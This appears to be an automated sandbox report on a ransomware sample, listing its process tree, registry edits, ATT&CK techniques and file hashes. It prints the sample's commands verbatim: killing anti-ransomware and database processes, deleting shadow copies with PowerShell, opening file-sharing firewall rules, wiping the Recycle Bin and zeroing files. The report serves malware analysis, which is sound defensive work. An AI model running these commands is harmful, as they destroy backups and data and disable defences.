c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe

pid	process
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe

description	pid	process	target process
PID 464 wrote to memory of 1188	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	taskkill.exe
PID 464 wrote to memory of 1188	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	taskkill.exe
PID 464 wrote to memory of 1188	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	taskkill.exe
PID 464 wrote to memory of 1188	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	taskkill.exe
PID 464 wrote to memory of 1068	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	reg.exe
PID 464 wrote to memory of 1068	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	reg.exe
PID 464 wrote to memory of 1068	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	reg.exe
PID 464 wrote to memory of 1068	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	reg.exe
PID 464 wrote to memory of 1064	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	reg.exe
PID 464 wrote to memory of 1064	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	reg.exe
PID 464 wrote to memory of 1064	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	reg.exe
PID 464 wrote to memory of 1064	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	reg.exe
PID 464 wrote to memory of 1828	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	schtasks.exe
PID 464 wrote to memory of 1828	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	schtasks.exe
PID 464 wrote to memory of 1828	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	schtasks.exe
PID 464 wrote to memory of 1828	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	schtasks.exe
PID 464 wrote to memory of 840	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	sc.exe
PID 464 wrote to memory of 840	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	sc.exe
PID 464 wrote to memory of 840	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	sc.exe
PID 464 wrote to memory of 840	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	sc.exe
PID 464 wrote to memory of 1672	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	sc.exe
PID 464 wrote to memory of 1672	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	sc.exe
PID 464 wrote to memory of 1672	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	sc.exe
PID 464 wrote to memory of 1672	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	sc.exe
PID 464 wrote to memory of 2032	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	sc.exe
PID 464 wrote to memory of 2032	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	sc.exe
PID 464 wrote to memory of 2032	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	sc.exe
PID 464 wrote to memory of 2032	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	sc.exe
PID 464 wrote to memory of 1756	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	sc.exe
PID 464 wrote to memory of 1756	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	sc.exe
PID 464 wrote to memory of 1756	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	sc.exe
PID 464 wrote to memory of 1756	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	sc.exe
PID 464 wrote to memory of 2036	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	sc.exe
PID 464 wrote to memory of 2036	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	sc.exe
PID 464 wrote to memory of 2036	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	sc.exe
PID 464 wrote to memory of 2036	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	sc.exe
PID 464 wrote to memory of 1112	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	sc.exe
PID 464 wrote to memory of 1112	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	sc.exe
PID 464 wrote to memory of 1112	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	sc.exe
PID 464 wrote to memory of 1112	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	sc.exe
PID 464 wrote to memory of 928	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	sc.exe
PID 464 wrote to memory of 928	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	sc.exe
PID 464 wrote to memory of 928	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	sc.exe
PID 464 wrote to memory of 928	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	sc.exe
PID 464 wrote to memory of 908	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	sc.exe
PID 464 wrote to memory of 908	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	sc.exe
PID 464 wrote to memory of 908	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	sc.exe
PID 464 wrote to memory of 908	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	sc.exe
PID 464 wrote to memory of 952	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	taskkill.exe
PID 464 wrote to memory of 952	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	taskkill.exe
PID 464 wrote to memory of 952	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	taskkill.exe
PID 464 wrote to memory of 952	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	taskkill.exe
PID 464 wrote to memory of 1592	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	taskkill.exe
PID 464 wrote to memory of 1592	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	taskkill.exe
PID 464 wrote to memory of 1592	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	taskkill.exe
PID 464 wrote to memory of 1592	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	taskkill.exe
PID 464 wrote to memory of 1768	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	taskkill.exe
PID 464 wrote to memory of 1768	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	taskkill.exe
PID 464 wrote to memory of 1768	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	taskkill.exe
PID 464 wrote to memory of 1768	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	taskkill.exe
PID 464 wrote to memory of 1556	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	taskkill.exe
PID 464 wrote to memory of 1556	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	taskkill.exe
PID 464 wrote to memory of 1556	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	taskkill.exe
PID 464 wrote to memory of 1556	464	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	taskkill.exe

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

Processes:

c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1"	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "Information..."	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "All your files are secured, please read the text note located in your desktop..."	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe

C:\Users\Admin\AppData\Local\Temp\c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
"C:\Users\Admin\AppData\Local\Temp\c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe"
1⤵
- Modifies extensions of user files
- Drops startup file
- Enumerates connected drives
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:464
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill" /F /IM RaccineSettings.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1188
- C:\Windows\SysWOW64\reg.exe
  "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
  2⤵
  PID:1068
- C:\Windows\SysWOW64\reg.exe
  "reg" delete HKCU\Software\Raccine /F
  2⤵
  - Modifies registry key
  PID:1064
- C:\Windows\SysWOW64\schtasks.exe
  "schtasks" /DELETE /TN "Raccine Rules Updater" /F
  2⤵
  PID:1828
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config Dnscache start= auto
  2⤵
  PID:840
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:1672
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config FDResPub start= auto
  2⤵
  PID:2032
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SSDPSRV start= auto
  2⤵
  PID:1756
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:2036
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:1112
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config upnphost start= auto
  2⤵
  PID:928
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:908
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:952
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1592
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM synctime.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1768
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1556
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1060
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1916
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1728
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:984
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1940
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM onenote.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1628
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM firefoxconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1712
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM encsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1716
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM excel.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1688
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM agntsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1776
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM dbeng50.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1076
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM PccNTMon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1920
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM CNTAoSMgr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1924
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM msaccess.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1164
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM thebat64.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:888
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM thebat.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1504
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlwriter.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1680
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocomm.exe /F
  2⤵
  - Kills process with taskkill
  PID:1292
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM infopath.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:912
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM outlook.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1612
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM steam.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1228
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1588
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mbamtray.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1908
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM tmlisten.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1496
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" IM thunderbird.exe /F
  2⤵
  - Kills process with taskkill
  PID:1912
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM wordpad.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1044
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM dbsnmp.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2032
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM msftesql.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:888
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM zoolz.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1828
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld-opt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1164
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM powerpnt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1548
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM xfssvccon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:288
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocautoupds.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:548
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1112
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocssd.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2024
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM visio.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1916
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM oracle.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1476
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlagent.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1376
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1888
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlbrowser.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1724
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM winword.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1676
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlservr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1276
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld-nt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1768
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1060
- C:\Windows\SysWOW64\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:1556
- C:\Windows\SysWOW64\netsh.exe
  "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
  2⤵
  PID:1900
- C:\Windows\SysWOW64\arp.exe
  "arp" -a
  2⤵
  PID:1472
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
  2⤵
  PID:1064
- C:\Windows\SysWOW64\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:1168
- C:\Windows\SysWOW64\netsh.exe
  "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
  2⤵
  PID:1908
- C:\Windows\SysWOW64\arp.exe
  "arp" -a
  2⤵
  PID:912
- C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_RECOVER_MY_FILES.hta
  2⤵
  - Blocklisted process makes network request
  - Modifies Internet Explorer settings
  - Modifies system certificate store
  - Suspicious behavior: GetForegroundWindowSpam
  PID:828
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
  2⤵
  PID:1124
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.7 -n 3
    3⤵
    - Runs ping.exe
    PID:1232
- - C:\Windows\SysWOW64\fsutil.exe
    fsutil file setZeroData offset=0 length=524288 “%s”
    3⤵
    PID:1496
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
  2⤵
  - Deletes itself
  PID:948
- - C:\Windows\SysWOW64\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:1448

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

Install Root Certificate

T1130

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5
687ae6550ed383971dc73960557b129b

SHA1
36990185d9836d6561d7e5b9070e6a5b31ae1fbf

SHA256
5426a906dafe18e00fe69ff5db0af77845286c36d7c7a005d86b1679bc092863

SHA512
8c8e8244c3012fe495a1f9765c520642e1340030cfc75b8aa113a14e7be918e2f08f1349ef380dcf8fd96d0fab7cef7cc3df15c2da86e4a5a5c66fe47d92b69c

Download Submit
C:\Users\Admin\Desktop\HOW_TO_RECOVER_MY_FILES.hta

MD5
e4abaa6cb7fcb6494eda9767448c4f2d

SHA1
ccd1126a5c7e4f803f4677482560552b10e57142

SHA256
dea0770f1a67c30fb659634a2b7477fafe64cd5381e9eca21fca12c45ae54821

SHA512
ff0e547382ab73ff9af44f2afc28b69bca07626c9b6218de2d3ca7bac5c19c9f02963b2fe530184d5331425b84522dfb8f1c0d2898e08699fbb3c32cc603ea95

Download Submit
memory/288-104-0x0000000000000000-mapping.dmp

Download
memory/464-57-0x00000000040D0000-0x00000000040D1000-memory.dmp

Filesize
4KB

Download
memory/464-55-0x00000000003A0000-0x00000000003A1000-memory.dmp

Filesize
4KB

Download
memory/548-106-0x0000000000000000-mapping.dmp

Download
memory/840-62-0x0000000000000000-mapping.dmp

Download
memory/888-101-0x0000000000000000-mapping.dmp

Download
memory/888-87-0x0000000000000000-mapping.dmp

Download
memory/908-69-0x0000000000000000-mapping.dmp

Download
memory/912-92-0x0000000000000000-mapping.dmp

Download
memory/928-68-0x0000000000000000-mapping.dmp

Download
memory/952-70-0x0000000000000000-mapping.dmp

Download
memory/984-77-0x0000000000000000-mapping.dmp

Download
memory/1044-99-0x0000000000000000-mapping.dmp

Download
memory/1060-117-0x0000000000000000-mapping.dmp

Download
memory/1060-119-0x00000000024A0000-0x00000000030EA000-memory.dmp

Filesize
12.3MB

Download
memory/1060-74-0x0000000000000000-mapping.dmp

Download
memory/1060-118-0x0000000075F41000-0x0000000075F43000-memory.dmp

Filesize
8KB

Download
memory/1064-60-0x0000000000000000-mapping.dmp

Download
memory/1064-125-0x0000000000000000-mapping.dmp

Download
memory/1068-59-0x0000000000000000-mapping.dmp

Download
memory/1076-84-0x0000000000000000-mapping.dmp

Download
memory/1112-67-0x0000000000000000-mapping.dmp

Download
memory/1112-107-0x0000000000000000-mapping.dmp

Download
memory/1164-103-0x0000000000000000-mapping.dmp

Download
memory/1164-88-0x0000000000000000-mapping.dmp

Download
memory/1188-58-0x0000000000000000-mapping.dmp

Download
memory/1228-94-0x0000000000000000-mapping.dmp

Download
memory/1276-115-0x0000000000000000-mapping.dmp

Download
memory/1292-91-0x0000000000000000-mapping.dmp

Download
memory/1376-111-0x0000000000000000-mapping.dmp

Download
memory/1472-124-0x0000000000000000-mapping.dmp

Download
memory/1476-110-0x0000000000000000-mapping.dmp

Download
memory/1496-97-0x0000000000000000-mapping.dmp

Download
memory/1504-89-0x0000000000000000-mapping.dmp

Download
memory/1548-105-0x0000000000000000-mapping.dmp

Download
memory/1556-120-0x0000000000000000-mapping.dmp

Download
memory/1556-73-0x0000000000000000-mapping.dmp

Download
memory/1588-95-0x0000000000000000-mapping.dmp

Download
memory/1592-71-0x0000000000000000-mapping.dmp

Download
memory/1612-93-0x0000000000000000-mapping.dmp

Download
memory/1628-79-0x0000000000000000-mapping.dmp

Download
memory/1672-63-0x0000000000000000-mapping.dmp

Download
memory/1676-114-0x0000000000000000-mapping.dmp

Download
memory/1680-90-0x0000000000000000-mapping.dmp

Download
memory/1688-82-0x0000000000000000-mapping.dmp

Download
memory/1712-80-0x0000000000000000-mapping.dmp

Download
memory/1716-81-0x0000000000000000-mapping.dmp

Download
memory/1724-113-0x0000000000000000-mapping.dmp

Download
memory/1728-76-0x0000000000000000-mapping.dmp

Download
memory/1756-65-0x0000000000000000-mapping.dmp

Download
memory/1768-72-0x0000000000000000-mapping.dmp

Download
memory/1768-116-0x0000000000000000-mapping.dmp

Download
memory/1776-83-0x0000000000000000-mapping.dmp

Download
memory/1828-61-0x0000000000000000-mapping.dmp

Download
memory/1828-102-0x0000000000000000-mapping.dmp

Download
memory/1888-112-0x0000000000000000-mapping.dmp

Download
memory/1900-122-0x0000000000000000-mapping.dmp

Download
memory/1908-96-0x0000000000000000-mapping.dmp

Download
memory/1912-98-0x0000000000000000-mapping.dmp

Download
memory/1916-75-0x0000000000000000-mapping.dmp

Download
memory/1916-109-0x0000000000000000-mapping.dmp

Download
memory/1920-85-0x0000000000000000-mapping.dmp

Download
memory/1924-86-0x0000000000000000-mapping.dmp

Download
memory/1940-78-0x0000000000000000-mapping.dmp

Download
memory/2024-108-0x0000000000000000-mapping.dmp

Download
memory/2032-64-0x0000000000000000-mapping.dmp

Download
memory/2032-100-0x0000000000000000-mapping.dmp

Download
memory/2036-66-0x0000000000000000-mapping.dmp

Download